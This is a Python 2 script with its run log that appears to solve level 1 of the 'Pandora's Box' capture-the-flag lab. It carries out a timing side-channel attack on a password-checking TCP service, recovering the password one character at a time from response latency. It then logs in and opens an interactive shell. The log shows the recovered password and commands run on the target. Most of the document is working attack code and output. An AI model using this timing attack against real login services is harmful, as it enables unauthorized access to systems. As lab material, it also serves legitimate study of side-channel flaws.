pandora_l1.py
#!/usr/bin/python | |
# Pandoras Box | |
# Level 1 | |
import time | |
import socket | |
import string | |
import sys | |
def find_next_char(sock, current_string):
    """ Take a current string, and perform a timing attack
    on the Pandoras Box Level one (tcp/54311 service)

    The only assumption the code makes is that the candidate
    character the service answers *fastest* is the correct one
    (strict-minimum selection below); why the service's response
    time depends on the guess is not visible here. Any server-side
    fix that makes the response time independent of the submitted
    value (constant-time comparison, a uniform delay) removes the
    signal this function measures.

    Python 2 only: string.lowercase / string.uppercase and
    sys.maxint do not exist on Python 3, and the guess is sent as
    a str.

    :param sock: connected socket; the caller is expected to have
                 consumed the banner/welcome lines already
    :param current_string: prefix recovered so far (may be '')
    :return: the single candidate character (not the full guess)
             whose averaged round-trip time was lowest
    """
    # candidate alphabet: a-z, A-Z, 0-9, tried in that order
    input_seq = string.lowercase
    input_seq += string.uppercase
    input_seq += string.digits
    # running minimum; every measured float is below sys.maxint,
    # so fastest_char is always assigned before the loop ends
    fastest_time = sys.maxint
    fastest_char = None
    for character_seq in input_seq:
        # full guess = known prefix + one candidate character
        character = current_string + character_seq
        # 5 round-trips per candidate are averaged to smooth jitter
        character_time = 0
        for i in range(5):
            # the timed window covers send() plus the recv() of the
            # reply, so network latency is part of every sample
            start_time = time.time()
            sock.send(character)
            # the reply is read only to complete the round-trip;
            # its contents are never inspected
            result = sock.recv(50)
            elapsed_time = time.time() - start_time
            character_time += elapsed_time
        # average of the 5 samples (float: elapsed_time is a float)
        character_time = character_time/5
        #print 'Character %s has time of %s' % (character, character_time)
        # keep the lowest average seen so far; strict '<' means the
        # earliest candidate wins an exact tie
        if character_time < fastest_time:
            fastest_time = character_time
            fastest_char = character_seq
    #print 'The fastest character was %s responding in %s' % (fastest_char, fastest_time)
    return fastest_char
def do_login(sock, password):
    """ Accept a socket and password and check the response
    when providing the password

    :param sock: connected socket to the level 1 service
    :param password: full candidate password to submit
    :return: True if the reply does not contain 'Invalid',
             False otherwise
    """
    print('Attempting login with: %s (%s)' % (password, len(password)))
    sock.send(password)
    reply = sock.recv(250)
    # The service flags a rejected password with the word
    # 'Invalid' in its reply; any other reply counts as success.
    if 'Invalid' in reply:
        return False
    print('Login success with password: %s' % password)
    return True
def do_shell(sock):
    """ Start interaction with a socket, accepting commands
    from the user.

    Reads one line from the operator per iteration, sends it
    with a trailing newline and prints the stripped reply. Ends
    (closing the socket) on an empty reply, on Ctrl-C or on EOF
    from stdin.

    :param sock: connected socket; closed before returning in
                 every exit path handled here
    """
    try:
        while True:
            # whatever the service has queued (typically its prompt)
            print(sock.recv(2048))
            line = raw_input("(py-shell) $ ")
            sock.send(line + "\n")
            reply = sock.recv(2048).strip()
            if not reply:
                print("[+] Empty response. Dead shell / exited?")
                sock.close()
                return
            print(reply)
    except KeyboardInterrupt:
        print("\n[+] ^C Received, closing connection")
        sock.close()
    except EOFError:
        print("\n[+] ^D Received, closing connection")
        sock.close()
if __name__ == '__main__':
    # TCP connection to the level 1 service
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('192.168.217.129', 54311))

    # two reads before the first guess; both values are unused
    # beyond draining the socket
    banner = sock.recv(250)
    welcome = sock.recv(250)

    # NOTE(review): there is no upper bound on the password length;
    # the loop only ends when do_login() reports success.
    password = ''
    logged_in = False
    while not logged_in:
        # extend the guess by one recovered character per round
        password += find_next_char(sock, password)
        logged_in = do_login(sock, password)

    # correct password found: hand the connection to the operator
    do_shell(sock)
root@007:~/pb0x# python pandora.py
Attempting login with: R (1)
Attempting login with: R3 (2)
Attempting login with: R3s (3)
Attempting login with: R3sp (4)
Attempting login with: R3sp3 (5)
Attempting login with: R3sp3c (6)
Attempting login with: R3sp3ct (7)
Attempting login with: R3sp3ctY (8)
Attempting login with: R3sp3ctY0 (9)
Attempting login with: R3sp3ctY04 (10)
Attempting login with: R3sp3ctY04r (11)
Attempting login with: R3sp3ctY04r4 (12)
Attempting login with: R3sp3ctY04r4d (13)
Attempting login with: R3sp3ctY04r4dm (14)
Attempting login with: R3sp3ctY04r4dm1 (15)
Attempting login with: R3sp3ctY04r4dm1n (16)
Attempting login with: R3sp3ctY04r4dm1ni (17)
Attempting login with: R3sp3ctY04r4dm1niS (18)
Attempting login with: R3sp3ctY04r4dm1niSt (19)
Attempting login with: R3sp3ctY04r4dm1niSt4 (20)
Attempting login with: R3sp3ctY04r4dm1niSt4t (21)
Attempting login with: R3sp3ctY04r4dm1niSt4t0 (22)
Attempting login with: R3sp3ctY04r4dm1niSt4t0r (23)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL (24)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1 (25)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1k (26)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1ke (27)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keY (28)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo (29)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4 (30)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R (31)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3 (32)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3s (33)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3sp (34)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spe (35)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spec (36)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spect (37)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY (38)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY0 (39)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04 (40)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04r (41)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG (42)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0 (43)
Attempting login with: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0q (44)
Login success with password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0q
Shell$
(py-shell) $ ls
level2
level2_readme.txt
Shell$
(py-shell) $ id
uid=1001(level1) gid=1001(level1) groups=1001(level1)
Shell$
(py-shell) $